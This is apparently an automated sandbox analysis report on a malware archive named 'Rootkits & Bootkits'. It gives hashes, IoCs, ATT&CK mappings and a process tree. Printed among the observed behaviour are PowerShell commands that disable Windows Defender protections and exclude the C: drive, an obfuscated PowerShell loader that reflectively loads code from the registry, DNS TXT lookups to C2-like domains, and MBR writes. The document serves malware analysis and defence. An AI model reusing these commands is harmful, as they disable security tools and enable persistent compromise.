Analysis
-
max time kernel
288s -
max time network
317s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2023 21:09
Behavioral task
behavioral1
Sample
Rootkits & Bootkits.zip
Resource
win10v2004-20231020-en
General
-
Target
Rootkits & Bootkits.zip
-
Size
99.1MB
-
MD5
daa4a303815b2f4b3383ae4e9cb9d70b
-
SHA1
71ad3c455f33dff881e05816d87f43e48b6a5084
-
SHA256
94e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24
-
SHA512
7c2fd76a9fc12382df8abb3ad459dc962ffe07ff03fd4801eb6a68e0802df9b5a1136fec3d421ffcfb387033ea9de3d302a878f1a901257be03f6271574557fa
-
SSDEEP
1572864:Hz9VYu6kNhSQlSkdCUZdoinM59VVzg4dPC7v9A17V3nBDlxn3hqzLpPr:TQk/HHnMHkHBA17lnTqpPr
Malware Config
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PTWRHNDALZ.lnk MsiExec.exe -
Loads dropped DLL 2 IoCs
pid Process 948 MsiExec.exe 948 MsiExec.exe -
Unexpected DNS network traffic destination 9 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 Destination IP 114.114.114.114 -
resource yara_rule behavioral1/memory/540-251-0x0000000000400000-0x000000000151E000-memory.dmp vmprotect behavioral1/memory/1928-255-0x0000000000400000-0x000000000157F000-memory.dmp vmprotect behavioral1/memory/540-323-0x0000000000400000-0x000000000151E000-memory.dmp vmprotect behavioral1/memory/1928-324-0x0000000000400000-0x000000000157F000-memory.dmp vmprotect behavioral1/memory/1928-326-0x0000000000400000-0x000000000157F000-memory.dmp vmprotect behavioral1/memory/1928-383-0x0000000000400000-0x000000000157F000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PTWRHNDALZ = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\PTWRHNDALZ.lnk" MsiExec.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 155 948 MsiExec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe File opened for modification \??\PHYSICALDRIVE0 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe File opened for modification \??\PHYSICALDRIVE0 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe File opened for modification \??\PHYSICALDRIVE0 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe File opened for modification \??\PHYSICALDRIVE0 f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File created C:\Windows\Installer\e597d06.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI7D83.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{817E4709-EB1A-4B7F-B602-C06BD1A2FEB4} msiexec.exe File created C:\Windows\Tasks\dialersvc32.job 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe File opened for modification C:\Windows\Installer\e597d06.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI813D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI8351.tmp msiexec.exe File created C:\Windows\addins\modulConfing.config 03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify\State = "0" taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify\UserEnabledStartupOnce = "0" taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3996 msiexec.exe 3996 msiexec.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2448 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeManageVolumePrivilege 2100 svchost.exe Token: SeShutdownPrivilege 4628 msiexec.exe Token: SeIncreaseQuotaPrivilege 4628 msiexec.exe Token: SeSecurityPrivilege 3996 msiexec.exe Token: SeCreateTokenPrivilege 4628 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4628 msiexec.exe Token: SeLockMemoryPrivilege 4628 msiexec.exe Token: SeIncreaseQuotaPrivilege 4628 msiexec.exe Token: SeMachineAccountPrivilege 4628 msiexec.exe Token: SeTcbPrivilege 4628 msiexec.exe Token: SeSecurityPrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeLoadDriverPrivilege 4628 msiexec.exe Token: SeSystemProfilePrivilege 4628 msiexec.exe Token: SeSystemtimePrivilege 4628 msiexec.exe Token: SeProfSingleProcessPrivilege 4628 msiexec.exe Token: SeIncBasePriorityPrivilege 4628 msiexec.exe Token: SeCreatePagefilePrivilege 4628 msiexec.exe Token: SeCreatePermanentPrivilege 4628 msiexec.exe Token: SeBackupPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeShutdownPrivilege 4628 msiexec.exe Token: SeDebugPrivilege 4628 msiexec.exe Token: SeAuditPrivilege 4628 msiexec.exe Token: SeSystemEnvironmentPrivilege 4628 msiexec.exe Token: SeChangeNotifyPrivilege 4628 msiexec.exe Token: SeRemoteShutdownPrivilege 4628 msiexec.exe Token: SeUndockPrivilege 4628 msiexec.exe Token: SeSyncAgentPrivilege 4628 msiexec.exe Token: SeEnableDelegationPrivilege 4628 msiexec.exe Token: SeManageVolumePrivilege 4628 msiexec.exe Token: SeImpersonatePrivilege 4628 msiexec.exe Token: SeCreateGlobalPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 3996 msiexec.exe Token: SeTakeOwnershipPrivilege 3996 msiexec.exe Token: SeRestorePrivilege 3996 msiexec.exe Token: SeTakeOwnershipPrivilege 3996 msiexec.exe Token: SeRestorePrivilege 3996 msiexec.exe Token: SeTakeOwnershipPrivilege 3996 msiexec.exe Token: SeRestorePrivilege 3996 msiexec.exe Token: SeTakeOwnershipPrivilege 3996 msiexec.exe Token: SeDebugPrivilege 2448 taskmgr.exe Token: SeSystemProfilePrivilege 2448 taskmgr.exe Token: SeCreateGlobalPrivilege 2448 taskmgr.exe Token: SeRestorePrivilege 3996 msiexec.exe Token: SeTakeOwnershipPrivilege 3996 msiexec.exe Token: SeRestorePrivilege 3996 msiexec.exe Token: SeTakeOwnershipPrivilege 3996 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4628 msiexec.exe 948 MsiExec.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 4628 msiexec.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 948 MsiExec.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe 2448 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1592 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe 1992 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe 2068 f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe 3644 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe 4416 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe 2032 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe 1436 03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3996 wrote to memory of 948 3996 msiexec.exe 127 PID 3996 wrote to memory of 948 3996 msiexec.exe 127 PID 3996 wrote to memory of 948 3996 msiexec.exe 127 PID 1592 wrote to memory of 4632 1592 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe 133 PID 1592 wrote to memory of 4632 1592 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe 133 PID 2068 wrote to memory of 4104 2068 f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe 135 PID 2068 wrote to memory of 4104 2068 f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe 135 PID 2068 wrote to memory of 4104 2068 f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe 135 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 808 attrib.exe
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Rootkits & Bootkits.zip"1⤵PID:4136
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4152
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:3128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\8dcc573293ae9a545655a47e23f106738a190f5318c31124bd3a73b12f128df6.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4628
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E04E82D44FFE3E025B0AF46B1777CC7B2⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:948
-
-
C:\Users\Admin\Desktop\6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe"C:\Users\Admin\Desktop\6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe"1⤵
- Maps connected drives based on registry
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\6B0CD0~1.EXE2⤵PID:4632
-
-
C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:1992
-
C:\Users\Admin\Desktop\f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe"C:\Users\Admin\Desktop\f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe"1⤵
- Maps connected drives based on registry
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\F428B4~1.EXE >> NUL2⤵PID:4104
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2448
-
C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:3644
-
C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:4416
-
C:\Users\Admin\Desktop\4e6b9a6d0870e85cbb957fc5e33503841f79f48e9f701f6e3d62a00dd8c82388.exe"C:\Users\Admin\Desktop\4e6b9a6d0870e85cbb957fc5e33503841f79f48e9f701f6e3d62a00dd8c82388.exe"1⤵PID:2436
-
C:\Users\Admin\Desktop\03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe"C:\Users\Admin\Desktop\03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1436
-
C:\Users\Admin\Desktop\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe"C:\Users\Admin\Desktop\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2032
-
C:\Users\Admin\Desktop\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"C:\Users\Admin\Desktop\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"1⤵PID:540
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.1142⤵PID:2640
-
-
C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe"C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe"1⤵PID:2120
-
C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe"C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe"2⤵PID:1948
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s c:\windows\system32\drivers\svihost.exe3⤵
- Views/modifies file attributes
PID:808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -c Set-MpPreference -PUAProtection 0"3⤵PID:4020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c Set-MpPreference -PUAProtection 04⤵PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -c Add-MpPreference -ExclusionPath "C:""3⤵PID:5012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c Add-MpPreference -ExclusionPath "C:"4⤵PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -c Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableIOAVProtection 1 -DisableScriptScanning 1"3⤵PID:3168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableIOAVProtection 1 -DisableScriptScanning 14⤵PID:4684
-
-
-
-
C:\Users\Admin\Desktop\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe"C:\Users\Admin\Desktop\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe"1⤵PID:1928
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.1142⤵PID:1060
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.1142⤵PID:3296
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.1142⤵PID:2572
-
-
C:\Users\Admin\Desktop\cce24ebdd344c8184dbaa0a0c4a65c7d952a11f6608fe23d562a4d1178915eac.exe"C:\Users\Admin\Desktop\cce24ebdd344c8184dbaa0a0c4a65c7d952a11f6608fe23d562a4d1178915eac.exe"1⤵PID:1376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵PID:4216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵PID:4440
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4596103d-7d7c-4aa0-b4e2-b990abc45620}1⤵PID:4100
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{290046e6-c08c-4636-a7bb-71496fa2abc7}1⤵PID:4372
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3832
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4416
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:1076
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
796B
MD52aadaddf607db540c3fcce0a0fa0cadb
SHA11335fc1e47027281f21c73147ce810e82dcd2bdc
SHA256c1918851e2da654a70c51d826018789aa752d40f07d5122eea97028310add6dc
SHA512940c224d48eac9c05a298fca82feb95194a829a0f4defe295dcef1dee4bc9ab219be10e905870701ebfa255ecfb337add64da7a9f8d400cd22497a586e9f6ce9
-
Filesize
23KB
MD53d68f2070cd6b55ccc55922f39aae66d
SHA19cac660d067ac29d2f837f5c994d9d8b3bd3fcf1
SHA256d939ff033a3a8b3f996827424e1898eb29389e0de350aaadb9b3defac5637df4
